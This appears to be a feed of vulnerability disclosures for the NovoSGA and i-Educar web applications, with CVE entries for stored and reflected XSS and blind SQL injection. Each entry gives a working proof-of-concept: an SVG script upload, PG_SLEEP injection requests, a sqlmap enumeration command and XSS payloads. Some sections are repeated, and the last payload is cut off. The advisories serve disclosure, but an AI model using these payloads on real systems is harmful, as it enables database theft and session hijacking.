application. This vulnerability allows attackers to upload malicious files into the <code>logoNavbar</code> and <code>logoLogin</code> parameters. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-10909-multiples-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass">CVE-2025-10909: Multiples Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10909" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10909</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p align="justify">Multiples Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the <code>/admin</code> endpoint of the NovoSGA application. This vulnerability allows attackers to upload malicious files into the <code>logoNavbar</code> and <code>logoLogin</code> parameters. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/admin</code></p> <p>Parameters: <code>logoNavbar</code>, <code>logoLogin</code></p> <p align="justify">The application fails to properly validate and sanitize user inputs in the <code>logoNavbar</code> and <code>logoLogin</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><p align="justify">Save the payload in the <code>xss.svg</code> file.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">""</span><span class="na">http:</span><span class="err">//</span><span class="na">www</span><span class="err">.</span><span class="na">w3</span><span class="err">.</span><span class="na">org</span><span class="err">/</span><span class="na">2000</span><span class="err">/</span><span class="na">svg</span><span class="err">""</span> <span class="na">fill</span><span class="o">=</span><span class="s">""</span><span class="na">none</span><span class="err">""</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">""</span><span class="nx">This</span> <span class="nx">is</span> <span class="nx">an</span> <span class="nx">XSS</span><span class="o">-</span><span class="nx">POC</span> <span class="nx">from</span> <span class="nx">CVEHUNTERS</span><span class="s2">""</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10909/image.png" width="565" height="262" srcset="/p/cve-2025-10909/image_hu_b57344f147506082.png 480w, /p/cve-2025-10909/image_hu_5d0c054a6a8a9ef0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="215" data-flex-basis="517px" /></p> <p><img src="/p/cve-2025-10909/image-1.png" width="547" height="248" srcset="/p/cve-2025-10909/image-1_hu_5e49e8aee02acf5b.png 480w, /p/cve-2025-10909/image-1_hu_26dd0b39f6a28a56.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="220" data-flex-basis="529px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 24 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10844/ https://www.cvehunters.com/p/cve-2025-10844/ <h2 id="cve-2025-10844-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecadastroaluno-endpoint">CVE-2025-10844: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>module/Cadastro/aluno</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10844" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10844</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/Cadastro/aluno</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-10844-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecadastroaluno-endpoint">CVE-2025-10844: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>module/Cadastro/aluno</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10844" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10844</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/Cadastro/aluno</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>module/Cadastro/aluno</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 9581=(SELECT 9581 FROM PG_SLEEP(5)) AND 'bffB'='bffB </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Cadastro/aluno?id=208%27%20AND%209581=(SELECT%209581%20FROM%20PG_SLEEP(5))%20AND%20%27bffB%27=%27bffB HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) </span></span><span class="line"><span class="cl">Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: </span></span><span class="line"><span class="cl">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; </span></span><span class="line"><span class="cl">q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <h3 id="normal-request">Normal request: </h3><p><img src="/p/cve-2025-10844/image.png" width="1041" height="564" srcset="/p/cve-2025-10844/image_hu_6d08bd4f212812a8.png 480w, /p/cve-2025-10844/image_hu_d5ec1ad3473d1422.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="442px" /></p> <h3 id="sqli-request">SQLi Request: </h3><p><img src="/p/cve-2025-10844/image-1.png" width="1043" height="561" srcset="/p/cve-2025-10844/image-1_hu_f74db5399c68b638.png 480w, /p/cve-2025-10844/image-1_hu_69ad34c8b657c13.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="446px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10845/ https://www.cvehunters.com/p/cve-2025-10845/ <h2 id="cve-2025-10845-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecomponentecurricularview-endpoint">CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>module/ComponenteCurricular/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10845" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10845</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/ComponenteCurricular/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-10845-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecomponentecurricularview-endpoint">CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>module/ComponenteCurricular/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10845" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10845</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/ComponenteCurricular/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>module/ComponenteCurricular/view</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost:8086 </span></span><span class="line"><span class="cl">sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) </span></span><span class="line"><span class="cl">Chrome/138.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: </span></span><span class="line"><span class="cl">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*; </span></span><span class="line"><span class="cl">q=0.8,application/signed-exchange;v=b3;q=0.7 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <h3 id="normal-request">Normal request: </h3><p><img src="/p/cve-2025-10845/image.png" width="1040" height="561" srcset="/p/cve-2025-10845/image_hu_1f049ffa2d1e5806.png 480w, /p/cve-2025-10845/image_hu_818dd237a2bfb1a8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="444px" /></p> <h3 id="sqli-request">SQLi Request: </h3><p><img src="/p/cve-2025-10845/image-1.png" width="1042" height="562" srcset="/p/cve-2025-10845/image-1_hu_87ce56b58b014bee.png 480w, /p/cve-2025-10845/image-1_hu_1763c7a45ffeff1f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="444px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10846/ https://www.cvehunters.com/p/cve-2025-10846/ <h2 id="cve-2025-10846-sql-injection-boolean-based-vulnerability-in-id-parameter-on-modulecomponentecurricularedit-endpoint">CVE-2025-10846: SQL Injection (Boolean-Based) Vulnerability in <code>id</code> Parameter on <code>module/ComponenteCurricular/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10846" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10846</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/ComponenteCurricular/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-10846-sql-injection-boolean-based-vulnerability-in-id-parameter-on-modulecomponentecurricularedit-endpoint">CVE-2025-10846: SQL Injection (Boolean-Based) Vulnerability in <code>id</code> Parameter on <code>module/ComponenteCurricular/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10846" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10846</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>module/ComponenteCurricular/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>module/ComponenteCurricular/edit</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -u "http://localhost:8086/module/ComponenteCurricular/edit?id=8" --cookie="i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE" --batch --dbs --dbms=postgresql </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10846/image.png" width="568" height="139" srcset="/p/cve-2025-10846/image_hu_46dff48085ff5914.png 480w, /p/cve-2025-10846/image_hu_3f5d69f095c33d40.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="408" data-flex-basis="980px" /></p> <p><img src="/p/cve-2025-10846/image-1.png" width="566" height="198" srcset="/p/cve-2025-10846/image-1_hu_fc558fb6fc4f6397.png 480w, /p/cve-2025-10846/image-1_hu_38cb0cffda3c380e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="285" data-flex-basis="686px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10846.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10846.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 23 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10584/ https://www.cvehunters.com/p/cve-2025-10584/ <h2 id="cve-2025-10584-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_calendario_anotacao_cadphp">CVE-2025-10584: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_calendario_anotacao_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10584" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10584</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_calendario_anotacao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_anotacao</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_calendario_anotacao_cad.php</code></p><h2 id="cve-2025-10584-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_calendario_anotacao_cadphp">CVE-2025-10584: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_calendario_anotacao_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10584" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10584</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_calendario_anotacao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_anotacao</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_calendario_anotacao_cad.php</code></p> <p>Parameters: <code>nm_anotacao</code> and <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_anotacao</code> and <code>descricao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10584/image.png" width="506" height="188" srcset="/p/cve-2025-10584/image_hu_2771ca3675e8bb86.png 480w, /p/cve-2025-10584/image_hu_1ae1524d207e0696.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="269" data-flex-basis="645px" /></p> <p><img src="/p/cve-2025-10584/image-1.png" width="513" height="192" srcset="/p/cve-2025-10584/image-1_hu_9c4497507da3b07c.png 480w, /p/cve-2025-10584/image-1_hu_4de765f0b51183da.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="267" data-flex-basis="641px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10584.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10590/ https://www.cvehunters.com/p/cve-2025-10590/ <h2 id="cve-2025-10590-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_detphp-parameter-ref_pessoa">CVE-2025-10590: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_det.php</code> parameter <code>ref_pessoa</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10590" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10590</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>ref_pessoa</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_det.php</code></p> <p>Parameter: <code>ref_pessoa</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,No known CVE><span class="p"></</span><span class="nt">SCRIPT</span><span class="p">></span>">'><span class="p"><</span><span class="nt">SCRIPT</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span 